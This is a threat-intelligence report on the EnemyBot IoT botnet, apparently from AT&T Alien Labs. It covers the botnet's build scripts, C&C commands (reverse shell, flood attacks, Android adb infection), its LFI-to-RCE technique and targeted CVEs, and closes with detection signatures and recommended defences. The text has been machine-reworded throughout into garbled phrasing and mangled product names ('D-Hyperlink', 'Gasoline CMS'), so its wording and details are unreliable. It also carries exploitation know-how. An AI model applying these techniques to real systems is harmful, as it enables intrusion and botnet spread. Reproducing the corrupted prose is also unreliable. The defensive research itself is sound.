Saturday, August 20, 2022
HomeCyber SecurityQuickly evolving IoT malware EnemyBot now concentrating on Content material Administration System...

Quickly evolving IoT malware EnemyBot now concentrating on Content material Administration System servers and Android units

Government abstract

AT&T Alien Labs™ has been monitoring a brand new IoT botnet dubbed “EnemyBot”, which is believed to be distributed by menace actor Keksec. Throughout our investigations, Alien Labs has found that EnemyBot is increasing its capabilities, exploiting not too long ago recognized vulnerabilities (2022), and now concentrating on IoT units, net servers, Android units and content material administration system (CMS) servers. As well as, the malware base supply code can now be discovered on-line on Github, making it broadly accessible.

Key takeaways:

  • EnemyBot’s base supply code might be discovered on Github, making it obtainable to anybody who desires to leverage the malware of their assaults.
  • The malware is quickly adopting one-day vulnerabilities as a part of its exploitation capabilities.
  • Companies reminiscent of VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and extra are being focused in addition to IoT and Android units.
  • The menace group behind EnemyBot, Keksec, is well-resourced and has the power to replace and add new capabilities to its arsenal of malware each day (see under for extra element on Keksec)


First found by Securonix in March 2022 and later detailed in an in-depth evaluation by Fortinet, EnemyBot is a brand new malware distributed by the menace actor “Keksec” concentrating on Linux machines and IoT units.

In accordance with the malware Github’s repository, EnemyBot derives its supply code from a number of botnets to a strong and extra adjustable malware. The unique botnet code that EnemyBot is utilizing contains: Mirai, Qbot, and Zbot. As well as, the malware contains customized improvement (see determine 1).

flame botnet

Determine 1. EnemyBot web page on Github.

The Keksec menace group is reported to have fashioned again in 2016 by numerous skilled botnet actors. In November 2021, researchers from Qihoo 360 described intimately the menace actor’s exercise in a presentation, attributing to the Keksec the event of botnets for various platforms together with Home windows and Linux:

  • Linux based mostly botnets: Tsunami and Gafgyt
  • Home windows based mostly botnets: DarkIRC, DarkHTTP
  • Twin techniques: Necro (developed in Python)

Supply code evaluation

The developer of the Github web page on EnemyBot self describes as a “full time malware dev,” that can be obtainable for contract work. The person states their office as “Kek safety,” implying a possible relationship with the broader Keksec group (see determine 2).

contract work availability

Determine 2. EnemyBot developer description.

The malware repository on Github accommodates 4 foremost sections:

This module is a Python script file that downloads all dependencies and compiles the malware into totally different OS architectures together with x86, ARM, macOS, OpenBSD, PowerPC, MIPS, and extra (see determine 3)

macOS malware

Determine 3. Compiling malware supply code to macOS executable.

As soon as compilation is full, the script then creates a batch file ‘’ which is utilized by the bot as a downloader that’s then delivered to any recognized weak targets to unfold the malware.

spreading EnemyBot

Determine 4. Generated `` file to unfold EnemyBot on totally different architectures.


That is the primary bot supply code. Although it’s lacking the primary exploitation operate, it contains all different performance of the malware and the assaults the bot helps by mixing the varied botnet supply codes as talked about above (Mirai, Qbot, and Zbot) — primarily Mirai and Qbot (see determine 5).

 EnemyBot source code

Determine 5. EnemyBot supply code.


This module is compiled and manually executed to encode / decode the malware’s strings by the attacker to cover strings in binary. For that, the malware is utilizing a easy swap desk, wherein every char is changed with a corresponding char within the desk (see in determine 6).

EnemyBot decode

Determine 6. String decode.


Determine 7 reveals the command-and-control part (C&C) botnet controller. C&C shall be executed on a devoted machine that’s managed by the attacker. It could possibly management and ship instructions to contaminated machines. (determine 7)

EnemyBot C&C

Determine 7. C&C part.

New variant evaluation

Most of EnemyBot performance pertains to the malware’s spreading capabilities, in addition to its skill to scan public-facing property and search for weak units. Nevertheless, the malware additionally has DDoS capabilities and might obtain instructions to obtain and execute new code (modules) from its operators that give the malware extra performance.

In new variants of EnemyBot, the malware added a webscan operate containing a complete of 24 exploits to assault vulnerabilities of various units and net servers (see determine 8).

figure 8

Determine 8. EnemyBot requires a brand new operate “webscan_xywz”.

To carry out these features, the malware randomly scans IP addresses and when it will get a response through SYN/ACK, EnemyBot then scans for vulnerabilities on the distant server by executing a number of exploits.

The primary exploit is for the Log4j vulnerability found final 12 months as CVE-2021-44228 and CVE-2021-45046:

EnemyBot Log4j

Determine 9. Exploiting the Log4J vulnerability.

The malware can also undertake new vulnerabilities inside days of these vulnerabilities being found. Some examples are Razer Sila (April 2022) which was revealed and not using a CVE (see determine 10) and a distant code execution (RCE) vulnerability impacting VMWare Workspace ONE with CVE-2022-22954 the identical month (see determine 11).

Razar sila vuln

Determine 10. Exploiting vulnerability in Razar Sila.

VMWare vuln

Determine 11. Exploiting vulnerability in VMWare Workspace ONE.

EnemyBot has additionally begun concentrating on content material administration techniques (e.g. WordPress) by looking for vulnerabilities in varied plugins, reminiscent of “Video Synchro PDF” (see determine 12).

EnemyBot WordPress

Determine 12. EnemyBot concentrating on WordPress servers.

Within the instance proven in determine 12, discover that the malware elevates a neighborhood file inclusion (LFI) vulnerability right into a RCE by injecting malicious code into the ‘/proc/self/environ’. This technique will not be new and was described in 2009. The malware makes use of LFI to name ‘environ’ and passes the shell command within the consumer agent http header.

One other instance of how the malware makes use of this technique is proven in determine 13. On this instance the malware is exploiting a vulnerability in DBltek GoIP.


Determine 13. Executing shell command by LFI vulnerability in DBltek.

In case an Android system is related by USB, or Android emulator working on the machine, EnemyBot will attempt to infect it by executing shell command. (determine 14)

Android case

Determine 14. EnemyBot “adb_infect” operate to assault Android units.

After an infection, EnemyBot will look ahead to additional instructions from its C&C. Nevertheless, in parallel it’ll additionally additional propogate by scanning for extra weak units. Alien Labs has listed under the instructions the bot can obtain from its C&C (correct as of the publishing of this text). 




Execute shell command


Ping to server, look ahead to command


Change loader server for payload.


Activate sniffer.


Create a reverse shell on an contaminated machine.


Flip off sniffer.


Begin UDP flood assault.


Begin TCP flood assault.


Begin HTTP flood assault.


Begin TCP connection flooder.


Begin TLS assault, begin handshake with out closing the socket.


Begin non spoofed UDP flooder.


Begin DNS flooder.


Begin/Cease scanner – scan and infect weak units.


Begin DDos assault on OVH.


Begin ICMP flooder.


Cease ongoing assaults. kill baby processes


Begin focused assault on ARK: Survivor Developed online game server.


Obtain targets listing from C&C and begin DNS assault.


Begin SSDP flood assault.

We’ve additionally listed the present vulnerabilities EnemyBot makes use of. As talked about, a few of them haven’t been assigned a CVE but. (As of the publishing of this text.)

CVE Quantity

Affected units

CVE-2021-44228, CVE-2021-45046




No CVE (vulnerability revealed on 2022-02)

Adobe ColdFusion 11 RCE


Liferay Portal – Java Unmarshalling through JSONWS RCE

No CVE (vulnerability revealed on 2022-04)

PHP Scriptcase 9.7 RCE


Zyxel NWA-1100-NH Command injection

No CVE (vulnerability revealed on 2022-04)

Razar Sila – Command injection


Spring Cloud Gateway – Code injection vulnerability


VMWare Workspace One RCE

CVE-2021-36356, CVE-2021-35064

Kramer VIAware RCE

No CVE (vulnerability revealed on 2022-03)

WordPress Video Synchro PDF plugin LFI

No CVE (vulnerability revealed on 2022-02)

Dbltek GoIP LFI

No CVE(vulnerability revealed on 2022-03)

WordPress Cab Fare Calculator plugin LFI

No CVE(vulnerability revealed on 2022-03)

Archeevo 5.0 LFI


Gasoline CMS 1.4.1 RCE



No CVE (vulnerability revealed on 2019)

ThinkPHP 5.X RCE

No CVE (vulnerability revealed on 2017)

Netgear DGN1000 ‘Setup.cgi’ RCE


TOTOLink A3000RU command injection vulnerability


D-Hyperlink units – HNAP SOAPAction – Header command injection vulnerability


ZHOME < S3.0.501 RCE


Zyxel P660HN – unauthenticated command injection


Seowon SLR 120 router RCE


D-Hyperlink DWR command injection in varied fashions

Advisable actions

  1. Preserve minimal publicity to the Web on Linux servers and IoT units and use a correctly configured firewall.
  2. Allow computerized updates to make sure your software program has the most recent safety updates.
  3. Monitor community site visitors, outbound port scans, and unreasonable bandwidth utilization.


Keksec’s EnemyBot seems to be simply beginning to unfold, nevertheless because of the authors’ fast updates, this botnet has the potential to develop into a serious menace for IoT units and net servers. The malware can shortly undertake one-day vulnerabilities (inside days of a printed proof of idea). This means that the Keksec group is properly resourced and that the group has developed the malware to make the most of vulnerabilities earlier than they’re patched, thus rising the pace and scale at which it could actually unfold.

Detection strategies

The next related detection strategies are in use by Alien Labs. They can be utilized by readers to tune or deploy detections in their very own environments or for aiding further analysis.


Log4j sids: 2018202, 2018203, 2034647, 2034648, 2034649, 2034650, 2034651, 2034652, 2034653, 2034654, 2034655, 2034656, 2034657, 2034658, 2034659, 2034660, 2034661, 2034662, 2034663, 2034664, 2034665, 2034666, 2034667, 2034668, 2034671, 2034672, 2034673, 2034674, 2034676, 2034699, 2034700, 2034701, 2034702, 2034703, 2034706, 2034707, 2034708, 2034709, 2034710, 2034711, 2034712, 2034713, 2034714, 2034715, 2034716, 2034717, 2034723, 2034743, 2034744, 2034747, 2034748, 2034749, 2034750, 2034751, 2034755, 2034757, 2034758, 2034759, 2034760, 2034761, 2034762, 2034763, 2034764, 2034765, 2034766, 2034767, 2034768, 2034781, 2034782, 2034783, 2034784, 2034785, 2034786, 2034787, 2034788, 2034789, 2034790, 2034791, 2034792, 2034793, 2034794, 2034795, 2034796, 2034797, 2034798, 2034799, 2034800, 2034801, 2034802, 2034803, 2034804, 2034805, 2034806, 2034807, 2034808, 2034809, 2034810, 2034811, 2034819, 2034820, 2034831, 2034834, 2034835, 2034836, 2034839, 2034886, 2034887, 2034888, 2034889, 2034890, 2838340, 2847596, 4002714, 4002715

4001913: AV EXPLOIT LifeRay RCE (CVE-2020-7961)

4001943: AV EXPLOIT Liferay Portal Java Unmarshalling RCE (CVE-2020-7961)

4002589: AV EXPLOIT LifeRay Distant Code Execution – update-column (CVE-2020-7961)

2031318: ET CURRENT_EVENTS 401TRG Liferay RCE (CVE-2020-7961)

2031592: ET WEB_SPECIFIC_APPS Liferay Unauthenticated RCE through JSONWS Inbound (CVE-2020-7961)

2035955: ET EXPLOIT Razer Sila Router – Command Injection Try Inbound (No CVE)

2035956: ET EXPLOIT Razer Sila Router – LFI Try Inbound (No CVE)

2035380: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-2294) (set)

2035381: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-2294)

2035876: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)

2035875: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)

2035874: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)

2036416: ET EXPLOIT Attainable VMware Workspace ONE Entry RCE through Server-Aspect Template Injection Inbound (CVE-2022-22954)

4002364: AV EXPLOIT Gasoline CMS RCE (CVE-2018-16763)

2030469: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Try M1

2030483: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Try M2

2836503: ETPRO EXPLOIT Tried THINKPHP < 5.2.x RCE Inbound

2836504: ETPRO EXPLOIT Tried THINKPHP < 5.2.x RCE Outbound

2836633: ETPRO EXPLOIT BlackSquid Failed ThinkPHP Payload Inbound

2026731: ET WEB_SERVER ThinkPHP RCE Exploitation Try

2024916: ET EXPLOIT Netgear DGN Distant Command Execution

2029215: ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound

2034576: ET EXPLOIT Netgear DGN Distant Code Execution

2035746: ET EXPLOIT Totolink – Command Injection Try Inbound (CVE-2022-25075)

4001488: AV TROJAN Mirai Outbound Exploit Scan, D-Hyperlink HNAP RCE (CVE-2015-2051)

2034491: ET EXPLOIT D-Hyperlink HNAP SOAPAction Command Injection (CVE-2015-2051)

4000095: AV EXPLOIT Unauthenticated Command Injection (ZyXEL P660HN-T v1)

4002327: AV TROJAN Mirai defective Zyxel exploit try

2027092: ET EXPLOIT Attainable ZyXEL P660HN-T v1 RCE

4002226: AV EXPLOIT Seowon Router RCE (CVE-2020-17456)

2035950: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M1 (CVE-2020-17456)

2035951: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M2 (CVE-2020-17456)

2035953: ET EXPLOIT D-Hyperlink DWR Command Injection Inbound (CVE-2018-10823)



Java Course of Spawning Scripting Course of


Java Course of Spawning WMIC

Java Course of Spawning Scripting Course of through Commandline (For Jenkins servers)

Suspicious course of executed by Jenkins Groovy scripts (For Jenkins servers)

Suspicious command executed by a Java listening course of (For Linux servers)

Related indicators (IOCs)

The next technical indicators are related to the reported intelligence. A listing of indicators can be obtainable within the OTX Pulse. Please notice, the heartbeat might embody different actions associated however out of the scope of the report.






Malware C&C



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash



Malware hash


Mapped to MITRE ATT&CK

The findings of this report are mapped to the next MITRE ATT&CK Matrix methods:

  • TA0001: Preliminary Entry:
    • T1190: Exploit Public-Going through Software
  • TA0008: Lateral Motion:
    • T1210: Exploitation of Distant Companies
    • T1021: Distant Companies
  • TA0011: Command and Management
    • T1132: Knowledge Encoding
    • T1001: Knowledge Obfuscation
    • T1030: Proxy:


Please enter your comment!
Please enter your name here

Most Popular

Recent Comments